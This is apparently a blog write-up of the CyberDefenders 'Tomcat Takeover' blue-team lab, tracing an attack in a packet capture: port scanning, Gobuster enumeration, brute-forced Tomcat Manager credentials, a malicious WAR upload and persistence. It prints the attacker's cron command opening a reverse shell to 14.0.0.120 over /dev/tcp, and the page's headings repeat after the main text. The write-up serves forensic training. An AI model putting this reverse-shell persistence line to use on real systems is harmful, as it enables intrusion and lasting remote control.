Lab Link: Blue team CTF Challenges | Tomcat Takeover - CyberDefenders

Scenario:

🧰 Tools Used

Wireshark → stream following and inspection of HTTP requests
tshark → command-line packet filtering and field extraction
CyberChef → decoding Base64 Authorization headers
Censys.io → IP lookup & geolocation of attacker infrastructure

❓ Questions & Answers

Q1: Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?

Step 1: Identify target Tomcat server:

tshark -r web_server.pcap -Y 'http.server contains "Apache-Coyote"' -T fields -e ip.src -e http.server

10.0.0.112      Apache-Coyote/1.1

Identifying Tomcat’s default response header (Apache-Coyote/1.1) confirms the server vendor.

📌 Why?
Tomcat by default includes a header like:

Server: Apache-Coyote/1.1

Apache-Coyote is the Tomcat HTTP connector component, so spotting this header is a strong fingerprint of a Tomcat server.

Step 2: Identify the source initiating scans:

tshark -r web_server.pcap -Y "ip.dst == 10.0.0.112" -T fields -e ip.src | sort | uniq -c | sort -nr

9776 14.0.0.120  # attacker
 769 10.0.0.115  # likely benign client or scan noise

👉 Final Answer: The IP performing the scans is 14.0.0.120

2. Based on the identified IP address associated with the attacker, can you identify the country from which the attacker's activities originated?

Lookup on Censys reveals that 14.0.0.120 is associated with China.

👉 Final Answer: China

3. From the PCAP file, multiple open ports were detected as a result of the attacker's active scan. Which of these ports provides access to the web server admin panel?

We need to figure out where the Tomcat admin interface is exposed. Let’s look at the server’s HTTP traffic

tshark -r web_server.pcap -Y "ip.src == 10.0.0.112 && http" -T fields -e tcp.srcport | sort -u

The server is listening on port 8080.

📌 Why this matters?
By default, Tomcat runs on:

8080 → HTTP (default Tomcat web interface)
8443 → HTTPS (SSL/TLS)
8009 → AJP connector (backend use, not web-facing)

In this case, the attacker is hitting http://10.0.0.112:8080, confirming the admin panel is exposed on 8080.

👉 Final Answer: port 8080

4. Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?

Check user-agent strings from the attacker:

tshark -r web_server.pcap -Y "ip.addr==14.0.0.120" -T fields -e http.user_agent | sort | uniq -c | sort -nr

   81 gobuster/3.6
   30 Mozilla/5.0 (Firefox)

👉 Final Answer: The attacker used Gobuster for directory enumeration.

Let’s search for any requests containing the keyword “manager”:

tshark -r web_server.pcap -Y 'http.request.uri contains "/manager"' -T fields -e http.request.full_uri

.../manager
.../manager/deploy
.../manager/html

📌 Why these paths?
Tomcat’s admin/manager interfaces typically live at:

/manager/html → Web admin console
/host-manager/html → Host manager (virtual host management)

Here we clearly see /manager/html was accessed, meaning the attacker is targeting the Tomcat Manager Application (where file uploads and deployments are possible).

👉 Final Answer: /manager

Since Tomcat’s /manager/html interface uses HTTP Basic Authentication, we know that credentials will appear in the Authorization header in Base64 format (username:password).

Step 1: Extract all Basic Auth attempts

We can list every attempt with tshark:

tshark -r web_server.pcap -Y 'http.authorization' -T fields -e frame.number -e ip.src -e http.authorization

20533   14.0.0.120      Basic YWRtaW46YWRtaW4=
20537   14.0.0.120      Basic dG9tY2F0OnRvbWNhdA==
20541   14.0.0.120      Basic YWRtaW46
20545   14.0.0.120      Basic YWRtaW46czNjcjN0
20549   14.0.0.120      Basic dG9tY2F0OnMzY3IzdA==
20553   14.0.0.120      Basic YWRtaW46dG9tY2F0
20571   14.0.0.120      Basic YWRtaW46dG9tY2F0
20579   14.0.0.120      Basic YWRtaW46dG9tY2F0
20616   14.0.0.120      Basic YWRtaW46dG9tY2F0

Clearly, multiple combinations were tried (brute-force attempt).

Not all attempts succeed — we need to match an Authorization header with an HTTP 200 OK response.

We filter for both /manager/html requests and their HTTP response codes:

 tshark -r 'web server.pcap' -Y "http.request.uri contains \"/manager/html\" || http.response.code" -T fields -e frame.number -e ip.src -e ip.dst -e http.authorization -e http.response.code

20553   14.0.0.120   10.0.0.112   Basic YWRtaW46dG9tY2F0
20568   10.0.0.112   14.0.0.120         200

This shows that the Authorization header in frame 20553 was immediately followed by a 200 OK (frame 20568). ✅

Step 3: Decode the credentials

Now decode the Base64 string:

echo 'YWRtaW46dG9tY2F0' | base64 -d

admin:tomcat

👉 Final Answer: Credentials used: admin:tomcat

7. Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?

Since the attacker gained access to the Tomcat Manager App, the next logical step would be uploading a malicious WAR file (Web Application Archive) to deploy a web shell or reverse shell.

Step 1: Filter for HTTP POST requests

File uploads in Tomcat are sent as POST requests to /manager/html/upload. Using tshark:

tshark -r 'web server.pcap' -Y 'http.request.method == "POST"' \
-T fields -e frame.number -e ip.src -e ip.dst -e http.request.uri

20616   14.0.0.120   10.0.0.112   /manager/html/upload;jsessionid=0DE586F27B2F48D0CA045F731E0E9E71?org.apache.catalina.filters.CSRF_NONCE=83EDF4E2462ECC725BAF342DD7A46974

This indicates that Frame 20616 contains a file upload attempt.

Step 2: Inspect the HTTP stream in Wireshark

Opening Frame 20616 in Wireshark → Follow → HTTP Stream, we can view the raw POST data.

Inside the multipart form-data, we find:

Content-Disposition: form-data; name="deployWar"; filename="JXQOZY.war"

👉 Final Answer: The attacker uploaded JXQOZY.war, a malicious WAR file likely containing a reverse shell.

8. After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?

Step 1: Filter for reverse shell connection

A reverse shell typically starts with the victim server connecting back to the attacker’s IP. To isolate this, I used a TCP filter in Wireshark:

ip.src == 14.0.0.120 && tcp.flags == 0x012

14.0.0.120 = Attacker’s IP
0x012 = SYN+ACK flags, used during connection establishment

This filter only returned 2 packets.

Step 2: Follow the TCP stream

By following the 2nd packet’s TCP stream, I could see the attacker’s interactive shell session.

Commands executed:

whoami

root

cd /tmp
pwd

/tmp

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'" > cron
crontab -i cron

crontab -l

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

👉 Final Answer:
The attacker added a cron job:

/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

CyberDefenders - Tomcat Takeover Lab Writeup

Scenario:

🧰 Tools Used

❓ Questions & Answers

Q1: Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?

Step 1: Identify target Tomcat server:

Step 2: Identify the source initiating scans:

2. Based on the identified IP address associated with the attacker, can you identify the country from which the attacker's activities originated?

3. From the PCAP file, multiple open ports were detected as a result of the attacker's active scan. Which of these ports provides access to the web server admin panel?

4. Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?

Step 1: Extract all Basic Auth attempts

Step 3: Decode the credentials

7. Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?

Step 1: Filter for HTTP POST requests

Step 2: Inspect the HTTP stream in Wireshark

8. After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?

Step 1: Filter for reverse shell connection

Step 2: Follow the TCP stream

Subscribe to my newsletter

kanishkar mathi

kanishkar mathi

CyberDefenders - Tomcat Takeover Lab Writeup

Scenario:

🧰 Tools Used

❓ Questions & Answers

Q1: Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?

Step 1: Identify target Tomcat server:

Step 2: Identify the source initiating scans:

2. Based on the identified IP address associated with the attacker, can you identify the country from which the attacker's activities originated?

3. From the PCAP file, multiple open ports were detected as a result of the attacker's active scan. Which of these ports provides access to the web server admin panel?

4. Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?

5. After the effort to enumerate directories on our web server, the attacker made numerous requests to identify administrative interfaces. Which specific directory related to the admin panel did the attacker uncover?

6. After accessing the admin panel, the attacker tried to brute-force the login credentials. Can you determine the correct username and password that the attacker successfully used for login?

Step 1: Extract all Basic Auth attempts

Step 2: Identify the successful login

Step 3: Decode the credentials

7. Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?

Step 1: Filter for HTTP POST requests

Step 2: Inspect the HTTP stream in Wireshark

8. After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?

Step 1: Filter for reverse shell connection

Step 2: Follow the TCP stream

Subscribe to my newsletter

kanishkar mathi

kanishkar mathi